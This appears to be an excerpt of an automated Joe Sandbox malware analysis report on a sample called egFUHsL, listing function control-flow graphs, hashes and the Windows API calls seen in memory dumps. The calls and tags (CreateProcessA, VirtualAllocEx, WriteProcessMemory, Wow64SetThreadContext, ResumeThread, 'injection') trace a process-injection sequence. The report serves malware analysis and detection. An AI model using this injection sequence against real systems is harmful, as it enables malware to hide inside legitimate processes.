                                                                                        control_flow_graph 251 2f1874 252 2f1879-2f187c 251->252 253 2f188e-2f189d 252->253 254 2f187e 252->254 274 2f189f-2f18a7 253->274 275 2f18b5-2f18dc call 2f3068 253->275 254->253 255 2f1a6d-2f1a87 254->255 256 2f1a9d-2f1afd 254->256 257 2f18ec-2f1987 254->257 258 2f198c-2f19bf 254->258 259 2f1ba7-2f1bb0 254->259 260 2f18e5-2f18ea 254->260 261 2f19d3-2f19e6 254->261 262 2f1a93-2f1a98 254->262 263 2f1b22-2f1b73 254->263 264 2f1b90-2f1ba4 254->264 265 2f1a60-2f1a68 254->265 255->252 348 2f1aff-2f1b07 256->348 349 2f1b15-2f1b1d 256->349 257->252 281 2f1bb3-2f1caf 258->281 292 2f19c5-2f19ce 258->292 260->252 280 2f19ec-2f1a23 261->280 261->281 262->252 263->281 329 2f1b75-2f1b84 263->329 265->252 274->275 296 2f18e2 275->296 324 2f1a25-2f1a2d 280->324 325 2f1a31-2f1a49 280->325 301 2f1cd1-2f1cd9 281->301 292->252 296->260 303 2f1cb1-2f1cb4 301->303 309 2f1cbd-2f1ccf 303->309 310 2f1cb6 303->310 309->303 310->301 310->309 312 2f1daf-2f1db7 310->312 313 2f1d7f-2f1d8e 310->313 314 2f1d0d-2f1d19 310->314 315 2f1d7c 310->315 316 2f1cdb-2f1ce9 310->316 317 2f1d6a-2f1d77 310->317 318 2f1e13-2f1e18 310->318 319 2f1de3-2f1de7 310->319 320 2f1d91-2f1d98 310->320 334 2f1dbe-2f1dc0 312->334 335 2f1db9-2f1dbd 312->335 313->320 330 2f1d1f-2f1d33 314->330 331 2f1e1d-2f1e6b 314->331 315->313 327 2f1ceb-2f1cf2 316->327 328 2f1d06-2f1d0b 316->328 317->303 318->303 337 2f1de9-2f1df2 319->337 338 2f1e08 319->338 320->331 333 2f1d9e-2f1daa 320->333 324->325 325->281 360 2f1a4f-2f1a5b 325->360 327->331 341 2f1cf8-2f1cff 327->341 342 2f1d04 328->342 329->252 330->331 343 2f1d39-2f1d50 330->343 333->303 346 2f1dcc-2f1dd3 334->346 347 2f1dc2 334->347 335->334 350 2f1df9-2f1dfc 337->350 351 2f1df4-2f1df7 337->351 340 2f1e0b-2f1e12 338->340 341->342 342->303 343->331 354 2f1d56-2f1d65 343->354 346->331 358 2f1dd5-2f1de1 346->358 356 2f1dc7 347->356 348->349 349->252 359 2f1e06 350->359 351->359 354->303 356->303 358->356 359->340
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: f"p$ f"p
                                                                                        • API String ID: 0-249740337
                                                                                        • Opcode ID: 94483302059883a6299b6941b09905ac4600a50588b89c04000f9bc516c002a1
                                                                                        • Instruction ID: fb67f794dffbdd432c3d88b5e69f906bf07f38eecc009913ba9294e047424e96
                                                                                        • Opcode Fuzzy Hash: 94483302059883a6299b6941b09905ac4600a50588b89c04000f9bc516c002a1
                                                                                        • Instruction Fuzzy Hash: 69716C30E2424DCBEB248F94D554BBCF3B5AB44391FA48076E611AB394C7B09CB1DB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F7D8B Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 363 2f7d8b-2f7d90 364 2f7d52-2f7d69 363->364 365 2f7d92-2f7dac 363->365 367 2f7d71-2f7d79 364->367 454 2f7d6b call 2f8f08 364->454 455 2f7d6b call 2f8da0 364->455 456 2f7d6b call 2f8db0 364->456 457 2f7d6b call 2f8fe0 364->457 372 2f7dcf 365->372 373 2f7dae-2f7db7 365->373 368 2f7cc3-2f7cc6 367->368 370 2f7cd8-2f7ce7 368->370 371 2f7cc8 368->371 400 2f7cff-2f7d1c 370->400 401 2f7ce9-2f7cef 370->401 371->370 375 2f803d-2f808b 371->375 376 2f7efb-2f7f05 371->376 377 2f7e68-2f7e7b 371->377 378 2f80a2-2f80b6 371->378 379 2f7fa1-2f7fa5 371->379 374 2f7dd2-2f7dd6 372->374 380 2f7dbe-2f7dcb 373->380 381 2f7db9-2f7dbc 373->381 382 2f7dd8-2f7de1 374->382 383 2f7df7 374->383 385 2f80c5 375->385 452 2f808d-2f8096 375->452 384 2f7f0b-2f7f17 376->384 376->385 377->385 405 2f7e81-2f7e89 377->405 386 2f7fc8 379->386 387 2f7fa7-2f7fb0 379->387 389 2f7dcd 380->389 381->389 392 2f7de8-2f7deb 382->392 393 2f7de3-2f7de6 382->393 390 2f7dfa-2f7e19 383->390 384->368 385->385 394 2f7fcb-2f7fcf 386->394 398 2f7fb7-2f7fc4 387->398 399 2f7fb2-2f7fb5 387->399 389->374 390->368 390->377 402 2f7df5 392->402 393->402 403 2f7ff2 394->403 404 2f7fd1-2f7fda 394->404 409 2f7fc6 398->409 399->409 423 2f7d3f 400->423 424 2f7d1e-2f7d27 400->424 406 2f7cf3-2f7cf5 401->406 407 2f7cf1 401->407 402->390 418 2f7ff5-2f8001 403->418 411 2f7fdc-2f7fdf 404->411 412 2f7fe1-2f7fee 404->412 415 2f7eac 405->415 416 2f7e8b-2f7e94 405->416 406->400 407->400 409->394 419 2f7ff0 411->419 412->419 422 2f7eaf-2f7eb1 415->422 420 2f7e9b-2f7ea8 416->420 421 2f7e96-2f7e99 416->421 436 2f8019-2f8026 418->436 437 2f8003-2f8009 418->437 419->418 429 2f7eaa 420->429 421->429 433 2f7ec3 422->433 434 2f7eb3-2f7ec1 422->434 432 2f7d42-2f7d4c 423->432 426 2f7d2e-2f7d3b 424->426 427 2f7d29-2f7d2c 424->427 439 2f7d3d 426->439 427->439 429->422 447 2f7d57-2f7d69 432->447 438 2f7ec5-2f7ec7 433->438 434->438 436->385 442 2f802c-2f8038 436->442 445 2f800d-2f800f 437->445 446 2f800b 437->446 440 2f7ec9-2f7ecf 438->440 441 2f7ee1-2f7ef6 438->441 439->432 448 2f7ed3-2f7edf 440->448 449 2f7ed1 440->449 441->368 442->368 445->436 446->436 458 2f7d6b call 2f8f08 447->458 459 2f7d6b call 2f8da0 447->459 460 2f7d6b call 2f8db0 447->460 461 2f7d6b call 2f8fe0 447->461 448->441 449->441 454->367 455->367 456->367 457->367 458->367 459->367 460->367 461->367
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: f"p$ f"p
                                                                                        • API String ID: 0-249740337
                                                                                        • Opcode ID: 0d5b9dfddd9b38e7f946869e442e9dd3766bdc4c6497c67d1086f64cfca8b522
                                                                                        • Instruction ID: 05f5c0c8051dd3bf577ee19ea75d9b75f225f9fb15d2db98bb5f904c31ec9b63
                                                                                        • Opcode Fuzzy Hash: 0d5b9dfddd9b38e7f946869e442e9dd3766bdc4c6497c67d1086f64cfca8b522
                                                                                        • Instruction Fuzzy Hash: 70517E30A2811CCFDB258F54D444BBDF3B2BF50381F65417AE612AB2A1CBB09CA5DB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA6573 Relevance: 1.8, APIs: 1, Instructions: 325processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 462 aa6573-aa6611 464 aa665a-aa6682 462->464 465 aa6613-aa662a 462->465 468 aa66c8-aa671e 464->468 469 aa6684-aa6698 464->469 465->464 470 aa662c-aa6631 465->470 479 aa6720-aa6734 468->479 480 aa6764-aa685b CreateProcessA 468->480 469->468 477 aa669a-aa669f 469->477 471 aa6633-aa663d 470->471 472 aa6654-aa6657 470->472 474 aa663f 471->474 475 aa6641-aa6650 471->475 472->464 474->475 475->475 478 aa6652 475->478 481 aa66c2-aa66c5 477->481 482 aa66a1-aa66ab 477->482 478->472 479->480 487 aa6736-aa673b 479->487 498 aa685d-aa6863 480->498 499 aa6864-aa6949 480->499 481->468 484 aa66af-aa66be 482->484 485 aa66ad 482->485 484->484 488 aa66c0 484->488 485->484 489 aa675e-aa6761 487->489 490 aa673d-aa6747 487->490 488->481 489->480 492 aa674b-aa675a 490->492 493 aa6749 490->493 492->492 494 aa675c 492->494 493->492 494->489 498->499 511 aa694b-aa694f 499->511 512 aa6959-aa695d 499->512 511->512 513 aa6951 511->513 514 aa695f-aa6963 512->514 515 aa696d-aa6971 512->515 513->512 514->515 518 aa6965 514->518 516 aa6973-aa6977 515->516 517 aa6981-aa6985 515->517 516->517 519 aa6979 516->519 520 aa69bb-aa69c6 517->520 521 aa6987-aa69b0 517->521 518->515 519->517 524 aa69c7 520->524 521->520 524->524
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AA683F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 3c98f4a7545aca201327e05262326d9ae4be2dc6d9dd0abbba23528dc09f9363
                                                                                        • Instruction ID: 59ba408317d389d541918d99d7913dd7b37c32b586a9ef3e4286a5503edc5743
                                                                                        • Opcode Fuzzy Hash: 3c98f4a7545aca201327e05262326d9ae4be2dc6d9dd0abbba23528dc09f9363
                                                                                        • Instruction Fuzzy Hash: 27C12570D00219CFDF24CFA4C855BEEBBB1BB4A304F0495A9E819B7290DB749A85CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA6578 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 526 aa6578-aa6611 528 aa665a-aa6682 526->528 529 aa6613-aa662a 526->529 532 aa66c8-aa671e 528->532 533 aa6684-aa6698 528->533 529->528 534 aa662c-aa6631 529->534 543 aa6720-aa6734 532->543 544 aa6764-aa685b CreateProcessA 532->544 533->532 541 aa669a-aa669f 533->541 535 aa6633-aa663d 534->535 536 aa6654-aa6657 534->536 538 aa663f 535->538 539 aa6641-aa6650 535->539 536->528 538->539 539->539 542 aa6652 539->542 545 aa66c2-aa66c5 541->545 546 aa66a1-aa66ab 541->546 542->536 543->544 551 aa6736-aa673b 543->551 562 aa685d-aa6863 544->562 563 aa6864-aa6949 544->563 545->532 548 aa66af-aa66be 546->548 549 aa66ad 546->549 548->548 552 aa66c0 548->552 549->548 553 aa675e-aa6761 551->553 554 aa673d-aa6747 551->554 552->545 553->544 556 aa674b-aa675a 554->556 557 aa6749 554->557 556->556 558 aa675c 556->558 557->556 558->553 562->563 575 aa694b-aa694f 563->575 576 aa6959-aa695d 563->576 575->576 577 aa6951 575->577 578 aa695f-aa6963 576->578 579 aa696d-aa6971 576->579 577->576 578->579 582 aa6965 578->582 580 aa6973-aa6977 579->580 581 aa6981-aa6985 579->581 580->581 583 aa6979 580->583 584 aa69bb-aa69c6 581->584 585 aa6987-aa69b0 581->585 582->579 583->581 588 aa69c7 584->588 585->584 588->588
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AA683F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 909950d544bc50f566db176ab6b1fe6bbec452e91f2b2dba9a1ce8e5b33bef04
                                                                                        • Instruction ID: 2b07c1622e707f3657b2c0b7a804e7edd380c774c9f3e29ed16d397795f82c9b
                                                                                        • Opcode Fuzzy Hash: 909950d544bc50f566db176ab6b1fe6bbec452e91f2b2dba9a1ce8e5b33bef04
                                                                                        • Instruction Fuzzy Hash: 82C12570D00219CFDF24CFA4C855BEEBBB1BB4A304F0495A9E819B7280DB749A85CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA61E0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 590 aa61e0-aa624b 592 aa624d-aa625f 590->592 593 aa6262-aa62c9 WriteProcessMemory 590->593 592->593 595 aa62cb-aa62d1 593->595 596 aa62d2-aa6324 593->596 595->596
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00AA62B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: bf816c7dd239b349814e23276a3389d4d8ad73f0dd2829498f1192eae0777258
                                                                                        • Instruction ID: 19459dc78e55d41aba5587db2ba3bef507d49591d1915ae172776b293027ec97
                                                                                        • Opcode Fuzzy Hash: bf816c7dd239b349814e23276a3389d4d8ad73f0dd2829498f1192eae0777258
                                                                                        • Instruction Fuzzy Hash: F04199B4D012589FCF00CFA9D984AEEFBB1BB49314F24942AE814BB250D774AA45CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA6338 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 601 aa6338-aa6408 ReadProcessMemory 604 aa640a-aa6410 601->604 605 aa6411-aa6463 601->605 604->605
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00AA63F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 24fcfaae02546baf9a7f7cf45f99992307dd0f078643106d94531a855af576e7
                                                                                        • Instruction ID: cd8d835a2e6ffebb46ddc305fba6dde26b8041915588d566b64aed8d96f7da0e
                                                                                        • Opcode Fuzzy Hash: 24fcfaae02546baf9a7f7cf45f99992307dd0f078643106d94531a855af576e7
                                                                                        • Instruction Fuzzy Hash: DF41AAB8D00258DFCF00CFA9D984AEEFBB1BB49310F24942AE815B7250D775AA45CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA6340 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 610 aa6340-aa6408 ReadProcessMemory 613 aa640a-aa6410 610->613 614 aa6411-aa6463 610->614 613->614
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00AA63F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 1d9630d59346ae971ef190d84acc71e781fbdd8d9c2af1f40fb0c8c761e79716
                                                                                        • Instruction ID: ae0b18713834c5e8561329204a82355cc4a91befc62f19e7696cdc6d9864c9ed
                                                                                        • Opcode Fuzzy Hash: 1d9630d59346ae971ef190d84acc71e781fbdd8d9c2af1f40fb0c8c761e79716
                                                                                        • Instruction Fuzzy Hash: D44199B8D00258DFCF00CFA9D984AEEFBB1BB49310F24942AE815B7250D775AA45CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA60B4 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 619 aa60b4-aa6178 VirtualAllocEx 622 aa617a-aa6180 619->622 623 aa6181-aa61cb 619->623 622->623
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00AA6162
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: b4aba5f75d5acbc26500eeccab75bb40906afac36cd15b4c1859b1a15b062bf7
                                                                                        • Instruction ID: 4f841b90b5f30ea13b3d4584e1c00a34839834ab6fdaeb8360c59b17636a0154
                                                                                        • Opcode Fuzzy Hash: b4aba5f75d5acbc26500eeccab75bb40906afac36cd15b4c1859b1a15b062bf7
                                                                                        • Instruction Fuzzy Hash: 8A41A8B8D00259DFCF10CFA9D984AEEFBB1AB49310F24942AE815BB250D735A906CF55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA60B8 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 628 aa60b8-aa6178 VirtualAllocEx 631 aa617a-aa6180 628->631 632 aa6181-aa61cb 628->632 631->632
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00AA6162
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: c88e9b9e5e67248e8711c3495b258e44d9a450522632ee234f044a25239a4c35
                                                                                        • Instruction ID: fda6f3eee1066131603f9fe8303c96a64e1cb1485e9898677250b8b31ef06b98
                                                                                        • Opcode Fuzzy Hash: c88e9b9e5e67248e8711c3495b258e44d9a450522632ee234f044a25239a4c35
                                                                                        • Instruction Fuzzy Hash: C44199B8D00259DFCF10CFA9D984AEEFBB1BB49310F24942AE814B7250D735A945CF55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA5F84 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 637 aa5f84-aa5fe8 639 aa5fea-aa5ffc 637->639 640 aa5fff-aa604d Wow64SetThreadContext 637->640 639->640 642 aa604f-aa6055 640->642 643 aa6056-aa60a2 640->643 642->643
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00AA6037
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: fe2cee174d16eb4ea01cf2431e652224308e1e2d5dc805b76ef8102bb678bbe1
                                                                                        • Instruction ID: a9068ec6858e43ac7b9ba0ee32cb9d5fd52aa821ff38047e6527340a602477b8
                                                                                        • Opcode Fuzzy Hash: fe2cee174d16eb4ea01cf2431e652224308e1e2d5dc805b76ef8102bb678bbe1
                                                                                        • Instruction Fuzzy Hash: 1941C0B4D00258DFDB10CFA9D984AEEFBB1BF49314F24802AE415B7250D7799A45CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA5F88 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 648 aa5f88-aa5fe8 650 aa5fea-aa5ffc 648->650 651 aa5fff-aa604d Wow64SetThreadContext 648->651 650->651 653 aa604f-aa6055 651->653 654 aa6056-aa60a2 651->654 653->654
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00AA6037
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 6ca10b03434a93961771b76d3d5b26b00ff8d7a16d732eb5e88f32a4d8cedbbb
                                                                                        • Instruction ID: de45f17437f5ec05654c0951c87ee8e004a1cd6d10133d1a02ad7f987e7163dc
                                                                                        • Opcode Fuzzy Hash: 6ca10b03434a93961771b76d3d5b26b00ff8d7a16d732eb5e88f32a4d8cedbbb
                                                                                        • Instruction Fuzzy Hash: 6641BDB4D00258DFDB10CFA9D984AEEFBB1BF49314F24842AE814B7250D779AA85CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA5E96 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 659 aa5e96-aa5f2c ResumeThread 662 aa5f2e-aa5f34 659->662 663 aa5f35-aa5f77 659->663 662->663
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 8d01261a22b6ffff129a2d7c61f9285d1bed2b6b384993023af2fe7f6df856ec
                                                                                        • Instruction ID: 0ebf6b620640a652cd28dc3b77ac852760e158d51032702b6abdab6f2281fe7b
                                                                                        • Opcode Fuzzy Hash: 8d01261a22b6ffff129a2d7c61f9285d1bed2b6b384993023af2fe7f6df856ec
                                                                                        • Instruction Fuzzy Hash: A431D8B8D00259DFCF10CFA9D984AEEFBB0AF89314F24842AE815B7250C734A905CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AA5E98 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.372341368.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_aa0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 7d2fff390f45234c35acf7e68101726c3197a467c0cd72702591780514382404
                                                                                        • Instruction ID: 1650fdbe68b983812edc835a789c6f10d1b302427cf523d1a24ac32f24ce237b
                                                                                        • Opcode Fuzzy Hash: 7d2fff390f45234c35acf7e68101726c3197a467c0cd72702591780514382404
                                                                                        • Instruction Fuzzy Hash: 4631D8B4D00248DFCF10CFA9D984AEEFBB0AF89314F24842AE814B7240C734A901CF98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F133D Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $p
                                                                                        • API String ID: 0-1693848773
                                                                                        • Opcode ID: 656820d9b5be5e6650e17942501dbfbf196d3af3953a3e618550aec45e3ab918
                                                                                        • Instruction ID: 626cbc2af929f9811164552a40a98f4796dd8c81700af5ee87268b0695e236e0
                                                                                        • Opcode Fuzzy Hash: 656820d9b5be5e6650e17942501dbfbf196d3af3953a3e618550aec45e3ab918
                                                                                        • Instruction Fuzzy Hash: 18B1063092D3AACFCB12CF7488951F9BFF0AF42344F6845AFD5819B182D2658976CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FAA65 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "p
                                                                                        • API String ID: 0-3514807228
                                                                                        • Opcode ID: fe0881b3a42df976f6e40f3e3f216810e56461d0ad54564741e31fb53470ec62
                                                                                        • Instruction ID: 287aca62fd38795748bbbe3130a060839831e7799e8de7735abbd3a38cbfb1d4
                                                                                        • Opcode Fuzzy Hash: fe0881b3a42df976f6e40f3e3f216810e56461d0ad54564741e31fb53470ec62
                                                                                        • Instruction Fuzzy Hash: B9519C7092820EDFCB01DFB8C8819AEBBB1EF16384F1444BAD50AE7261D7709955DB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F92AC Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !
                                                                                        • API String ID: 0-2657877971
                                                                                        • Opcode ID: fe13ccbe7b67504993f1173f6f3ccc540840678e27401113544aca6792e9b429
                                                                                        • Instruction ID: 0fc3fcbf8569a34f19f044647a0c4fbd1a60289e82306b955da0ae0ca2621b50
                                                                                        • Opcode Fuzzy Hash: fe13ccbe7b67504993f1173f6f3ccc540840678e27401113544aca6792e9b429
                                                                                        • Instruction Fuzzy Hash: ED41C031924219CFCB10DF6DC8403BAF7B5AF84341F248177DA56EB291C37498A2CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F0C50 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: I&
                                                                                        • API String ID: 0-2993644366
                                                                                        • Opcode ID: da6a32e94a3f7c7844bff50d824d800d97b4b5d5479cec692133e533780ea00d
